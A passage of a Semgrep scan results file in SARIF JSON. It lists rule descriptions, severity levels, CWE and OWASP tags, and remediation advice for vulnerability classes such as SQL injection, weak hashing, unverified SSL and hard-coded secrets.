[https://owasp.org/Top10/A02_2021-Cryptographic_Failures/](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n","text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","id":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","name":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","properties":{"precision":"very-high","tags":["CWE-310: CWE CATEGORY: Cryptographic Issues","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context)\n - [https://docs.python.org/3/library/ssl.html#ssl-security](https://docs.python.org/3/library/ssl.html#ssl-security)\n - [https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection](https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context","id":"python.lang.security.unverified-ssl-context.unverified-ssl-context","name":"python.lang.security.unverified-ssl-context.unverified-ssl-context","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.unverified-ssl-context.unverified-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint","id":"rust.actix.sql.postgres-taint.postgres-taint","name":"rust.actix.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","id":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","name":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","id":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","name":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"help":{"markdown":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy)\n - [https://chainsecurity.com/heartbreaks-curve-lp-oracles/](https://chainsecurity.com/heartbreaks-curve-lp-oracles/)\n - [https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/](https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/)\n","text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","id":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","name":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"help":{"markdown":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl](https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","id":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","name":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"help":{"markdown":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsJs](https://docs.angularjs.org/api/ng/service/$sce#trustAsJs)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","id":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","name":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"help":{"markdown":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection","id":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","name":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","properties":{"precision":"very-high","tags":["CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.unsafe-reflection.unsafe-reflection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"help":{"markdown":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal)\n - [https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall)\n","text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"helpUri":"https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","id":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","name":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"help":{"markdown":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password)\n - [https://tools.ietf.org/html/rfc6151](https://tools.ietf.org/html/rfc6151)\n - [https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision](https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n - [https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords](https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords)\n - [https://github.com/returntocorp/semgrep-rules/issues/1609](https://github.com/returntocorp/semgrep-rules/issues/1609)\n - [https://docs.python.org/3/library/hashlib.html#hashlib.scrypt](https://docs.python.org/3/library/hashlib.html#hashlib.scrypt)\n","text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password","id":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","name":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.md5-used-as-password.md5-used-as-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"help":{"markdown":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string","id":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","name":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"help":{"markdown":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)\n","text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","id":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","name":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"help":{"markdown":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli)\n - [https://sequelize.org/master/manual/raw-queries.html](https://sequelize.org/master/manual/raw-queries.html)\n","text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","id":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","name":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution)\n - [https://owasp.org/www-community/attacks/Code_Injection](https://owasp.org/www-community/attacks/Code_Injection)\n - [https://stackoverflow.com/questions/3115559/exploitable-php-functions](https://stackoverflow.com/questions/3115559/exploitable-php-functions)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution","id":"php.lang.security.tainted-code-execution.tainted-code-execution","name":"php.lang.security.tainted-code-execution.tainted-code-execution","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-code-execution.tainted-code-execution"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request)\n - [https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-](https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-)\n - [https://www.baeldung.com/rest-template](https://www.baeldung.com/rest-template)\n","text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","id":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","name":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring)\n - [https://cwe.mitre.org/data/definitions/134.html](https://cwe.mitre.org/data/definitions/134.html)\n","text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","id":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","name":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","properties":{"precision":"very-high","tags":["CWE-134: Use of Externally-Controlled Format String","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","id":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","name":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This 